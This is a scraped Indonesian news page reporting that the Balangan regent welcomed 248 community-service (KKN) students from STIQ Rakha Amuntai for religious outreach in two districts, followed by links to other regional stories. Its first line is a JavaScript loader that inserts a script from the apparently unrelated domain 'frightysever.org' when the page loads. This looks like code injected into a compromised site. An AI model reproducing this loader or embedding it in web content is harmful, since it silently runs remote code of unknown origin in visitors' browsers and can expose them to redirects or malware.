(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Bupati Balangan Sambut 248 Mahasiswa KKN STIQ Rakha


KANALKALIMANTAN.COM, PARINGIN – Bupati Balangan H Abdul Hadi sambut kedatangan mahasiswa Kuliah Kerja Nyata (KKN) Sekolah Tinggi Ilmu Al Qur’an (STIQ) Rasyidiyah Khalidiyah (Rakha) Amuntai, di Mahligai Mayang Maurai, Senin (28/8/2023).

Sebanyak 248 mahasiswa STIQ Rakha Amuntai melaksanakan KKN pada dua kecamatan yaitu Kecamatan Batumandi dan Lampihong.

Bupati Abdul Hadi mengatakan kegiatan KKN ini sangat membantu pelaksanaan pembangunan program-program pemerintah khususnya di wilayah pedesaan.

Mahasiswa sebagai agen perubahan diharapkan bisa membawa pencerahan, inovasi dan perubahan ke arah yang positif bagi masyarakat desa.

Sementara itu, Ketua STIQ Rakha Amuntai H Abdul Hasib Salim sangat berterima kasih kepada Pemerintah Kabupaten Balangan atas kesediaan dalam memberikan kesempatan kepada mahasiswa STIQ Rakha Amuntai yang melaksanakan KKN di Kecamatan Batumandi dan Lampihong.

H Abdul Hasib Salim menjelaskan bahwa program kegiatan KKN mahasiswa STIQ Rakha Amuntai ini lebih fokus pada pembinaan keagamaan.

“Kegiatan KKN ini akan lebih banyak konsentrasinya tentang ilmu Al Qur’an karena dasarnya memang Sekolah Tinggi Ilmu Al Qur’an,” jelasnya.

Abdul Hasib Salim mengharapkan kepada mahasiswa agar bisa mengaplikasikan seluruh pengetahuannya dan mampu melakukan adaptasi di lingkungan masyarakat.

“Jadi bagaimana mereka belajar bermasyarakat dan bagi masyarakat juga ada sesuatu yang barangkali bisa didapatkan perubahan-perubahan yang terjadi dan kerja sama yang terjadi di masyarakat lebih beruntung lagi,” harapnya.

Salah satu mahasiswi STIQ Rakha Amuntai, Zihan Hayati yang akan melakukan KKN di Desa Kupang, Kecamatan Lampihong mengaku siap berpartisipasi dan berkontribusi nyata kepada masyarakat di lokasi KKN.

Beberapa program kegiatan pun sudah direncanakan dan berharap KKN tahun ini dapat berjalan lancar sesuai dengan visi misi STG Amuntai, untuk membangun masyarakat yang madani, Robbani dan berlandaskan Al Qur’an.

“Sementara ada beberapa agenda yang sudah kami rencanakan dan segera kami laksanakan dan ingin kami ajukan kepada kepala desa serta berusaha semaksimal mungkin untuk mengikuti kegiatan-kegiatan masyarakat seperti yasinan, mengaji untuk anak-anak, maulid habsyi, ceramah agama dan Posyandu,” ujarnya. (mcbalangan/kanalkalimantan.com/adv)

Reporter : adv
Editor : kk


Muhammad Andi

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

2 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

2 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

2 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

2 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

3 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

3 jam ago

This website uses cookies.